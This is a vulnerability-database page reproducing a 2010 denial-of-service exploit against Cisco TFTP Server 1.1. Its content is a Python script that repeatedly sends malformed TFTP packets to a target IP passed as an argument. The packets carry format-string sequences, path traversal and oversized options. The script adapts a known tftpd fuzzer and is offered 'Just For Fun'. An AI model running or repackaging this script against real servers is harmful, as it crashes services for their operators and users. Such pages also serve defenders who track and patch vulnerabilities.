Vulners
Lucene search
Cisco TFTP Server 1.1 - Denial of Service
# Exploit Title: [Cisco TFTP Server 1.1]
# Date: [2010-03-25]
# Author: [_SuBz3r0_]
# Software Link: [http://www.oldversion.com/Cisco_TFTP_Server.html]
# Version: [1.1]
# Tested on: [XP SP3,Win2k3]
# CVE : [if exists]
# Code :
#Cisco TFTP Server v1.1 DoS
print ""
print "##############################################"
print "# _SuBz3r0_ #"
print "##############################################"
print ""
print "Cisco TFTP v1.1 Remote DoS"
print "Just For Fun"
print "tftp_fuzz.py [ip of server]"
print ""
print "Greetz:piloo le canari & MaX"
print "Credits to Ilja van Sprundel"
print "Tested on: French Windows Xp Sp3 fully Patched"
print ""
#!/usr/bin/python
# tftpd fuzzer by Ilja van Sprundel
# implements rfc 1350, 2090, 2347, 2348, 2349
#
# todo: - 1 option per packet
# - lots (>100) (small) options per packet
# - add better option support to OACK
# - client fuzzing ?
import os, socket, sys, struct, random
port = 69
type = ["netascii", "octet", "binary", "mail"]
asize = ["blkzise", "tsize"]
class fuzz:
def __init__(self):
""" """
def randstring(self, len):
thestring = ""
what = random.randint(0,5)
if what < 5:
for i in range(len):
char = chr(random.randint(1,255))
thestring += char
else:
thestring = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
return thestring
def randbin(self, len):
thestring = ""
for i in range(len):
char = chr(random.randint(0,255))
thestring += char
return thestring
def fuzz_rw(self):
""" """
data = ""
if not random.randint(0,50):
return ""
if not random.randint(0,10):
if random.randint(0,1):
data = "../"
else:
howmany = random.randint(1,100)
data = "../" * howmany
data += self.randstring(random.randint(0,3000))
# no 0byte
if not random.randint(0,10):
return data
data += "\0"
# no mode
if not random.randint(0,100):
return data
if random.randint(0,5):
data += random.choice(type)
else:
data += self.randstring(random.randint(0,3000))
if not random.randint(0,10):
return data
data += "\0"
if not random.randint(0,10):
return data
options = random.randint(0,100)
if not random.randint(0,10):
breakloop = 1
breakit = random.randint(0, options)
else:
breakloop = 0
longarg = random.randint(0, options)
if not random.randint(0,10):
lowlimit = 16
options = options / 4
else:
lowlimit = 0
for i in range(options):
which = random.randint(lowlimit, 19)
if which < 16:
if longarg == i:
data += self.randstring(random.randint(0,3000))
else:
data += self.randstring(random.randint(0,100))
data += "\0"
data += self.randstring(random.randint(0,100))
if which == 16:
data += "multicast\0"
if not random.randint(0,5):
if random.randint(0,1):
data += self.randstring(random.randint(0,50))
else:
data += str(random.randint(0, 0xffffffff))
if which == 17 or which == 18:
data += random.choice(asize) + "\0"
if random.randint(0,10):
if random.randint(0,1):
uplimit = 65535
else:
uplimit = 0xffffffff
string = str(random.randint(0, uplimit))
if random.randint(0,1):
data += "-"
data += string
else:
data += self.randstring(random.randint(0,50))
if which == 19:
data += "timeout\0"
if random.randint(0,10):
which = random.randint(0,5)
if which < 4:
uplimit = 255
if which == 4:
uplimit = 65535
else:
uplimit = 0xffffffff
string = str(random.randint(0, uplimit))
if random.randint(0,1):
data += "-"
data += string
else:
data += self.randstring(random.randint(0,50))
if breakloop:
if i == breakit:
return data
data += "\0"
return data
def make_data(self):
""" """
which = random.randint(0,10)
if which < 6:
# read is more likely to be accepted then write
# hence we bias it towards reading !
if random.randint(0,2):
d = "\x00\x01"
else:
d = "\x00\x02"
d += self.fuzz_rw()
# do some tftpd's do something with this ???
elif which == 6:
d = "\x00\x03"
d += self.randbin(2)
d += self.randbin(random.randint(0,3000))
elif which == 7:
d = "\x00\x04"
d += self.randbin(2)
if not random.randint(0,10):
d += self.randbin(random.randint(0,3000))
elif which == 8:
d = "\x00\x05"
d += self.randbin(2)
d += self.randstring(random.randint(0,1000))
if random.randint(0,10):
d += "\0"
elif which == 9:
# lets do this later ....
d = "\x00\x06"
d += self.randbin(1000)
else:
if random.randint(0,2):
times = 512
else:
times = random.randint(512, 10000)
d = self.randbin(random.randint(0,times))
return d
def run(self):
""" """
packets = 0
try:
while 1:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
da = self.make_data()
s.sendto(da, (host, port))
s.close()
os.write(1,".")
packets += 1
except KeyboardInterrupt:
print "\nPackets: " + str(packets)
if __name__ == '__main__':
if len(sys.argv) <= 1:
sys.exit(0)
host = sys.argv[1]
if len(sys.argv) >= 3:
port = sys.argv[2]
f = fuzz()
f.run()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Mar 2010 00:00Current
7.4High risk
Vulners AI Score7.4